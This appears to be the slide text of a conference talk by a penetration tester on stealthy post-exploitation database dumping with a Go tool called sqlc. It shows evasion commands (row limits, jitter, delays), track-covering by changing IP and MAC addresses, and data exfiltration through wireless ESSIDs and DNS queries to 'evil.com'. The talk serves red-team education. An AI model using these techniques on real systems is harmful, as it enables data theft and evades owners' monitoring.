Art of Dumping Databases

Dumping with style

Vlatko Kosturjak (@k0st), BalCCon Novi Sad, 16th of September

Agenda

  • Introduction
  • Sysadmin perspective
  • Attacker perspective
  • Data dumping
  • Data exfiltration
  • Tools of trade
  • Summary
  • Questions and answers

45 minutes

Kost: About me

  • Security Consultant in Diverto
    • offensive/penetration tester
    • read teaming
  • Security testing
    • software/systems/mobile/infrastructure
    • embedded/IoT/ICS/SCADA
  • Linux and FLOSS enthusiast
  • Open source developer

Customer experience

  • although compromised
    • domain admin
    • root
    • DBA
  • dump would be seen!
  • we have monitoring
    • we have logs
    • we have sensors and alerts
    • we have monitoring

Dumping database: sysadmin

  • data consistency
  • maintenance window
  • scaling
  • purpose
    • backup
    • migration
    • sync
    • ...

Standard database dumping

    	
mysqldump -u user -p database > dump.sql

    	
pg_dump -d database > dump.sql

Dumping database: sysadmin standard

  • noisy
  • data consistency
  • table locking
  • visible on monitoring
    • massive database activity
    • massive IO activity
    • massive network activity
    • ...
  • very fast

Dumping database: sysadmin protection

  • database options
    • database performance
    • log slow queries
    • ...
  • admin/user experience
    • database performance
    • slower responses
  • database firewall
    • detecting dumps (e.g.more than 100 rows)

Dumping database: attacker perspective

  • post exploitation part
  • attacker already performed
    • recon
    • vulnerability identification
    • vulnerability exploitation
    • lateral movement
  • attacker obtained DB credentials

Dumping database: attacker perspective

  • data consistency not so important
  • slower speed
  • stealthy
    • divide by chunks
    • delay random time (jitter)
    • exfiltration options
    • extendable

Standard way

  • statically compile clients
  • write script for each engagement
  • does not scale
  • toolkit/dependency problems
  • waste of time
  • Advantages
    • written specifically for project

Go

  • Why Go?
    • Vyrus talk from previous BalCCon
  • Advantages
    • multi platform
    • statically linked binary
    • single binary
    • frequent change to core

Go

  • Language features
    • SQL drivers for most databases
  • Mentioned Advantages
    • multi platform
    • statically linked binary
    • single binary
    • frequent change to core

Go

  • Multiplatform
    • Windows
    • Linux
    • Mac OS X
  • Database drivers
    • Sqlite
    • Postgres
    • MySQL
    • MS SQL
    • Oracle*
    • ...

sqlc come to life

Basic usage

    	
$ sqlc list
mssql
mysql
postgres
sqlite3
sqlserver

    	
sqlc -d sqlite3 console

    	
sqlc -d mysql dump > dump.sql

Basic stealth usage

    Limit number of rows returned per query: 
    	
sqlc --limit-rows 3 console
    limit and delay seconds between queries 
    	
sqlc --limit-rows 10 --delay-between 5s console

Stealth usage - jitter

    Limit number of rows returned per query with jitter: 
    	
sqlc --min-rows 3 --max-rows 10 console
    limit and delay seconds between queries with jitter: 
    	
sqlc --min-delay 10s --max-delay 60s --min-rows 3 --max-rows 10 console

Covering the tracks

    	
sqlc -e 'ifconfig eth0 192.168.1.1'

    	
sqlc -E 'ifconfig eth0 hw ether CE:CA:60:6A:CE:CA; ifconfig eth0 192.168.1.1' ....

Exfiltrating data via wireless

    	
sqlc -e 'iwconfig eth0 essid sqlc_{B64DATA}; sleep 15' ...

Exfiltrating data via DNS

    	
sqlc -e 'host {B64DATA}.evil.com' ...
    On evil: 
    	
tcpdump -s 0 -vvv -i eth0 port 53

Powershell

  • Invoke-DBDump ?
    • Not so portable / multiplatform
  • In-memory?
    • don't touch disks
    • Other ways to execute exe from memory
  • Database drivers
    • missing poor Powershell implementation
  • Looking forward for your implementation!

Sqlmap? Sqlninja?

  • Vulnerability in application
    • SQL injection
  • Some of them have direct connection support
    • dependency problem
  • sqlc
    • You need to have direct database connecivity
    • Not for exploiting SQL injection
    • Silent/stealthy dumping

Future

  • Evil client side
    • DNS tunneling
    • Wifi exfiltration
    • ...
  • More databases
    • Oracle?
    • DB2?
  • flexible queries
  • stacked queries
  • nosql?

Summary

  • Writting scripts for each engagement
    • Does not scale
    • Dependency problems
  • You need to have database connecivity
  • sqlc
    • Single executable client for multiple platforms
    • Silent/stealthy dumping

Tool/links

Credits/Thanks to

  • Vyrus
    • Go lang addiction
  • organizers
    • thanks for having me
  • You - thanks for listening!

Thanks on listening

?

@k0st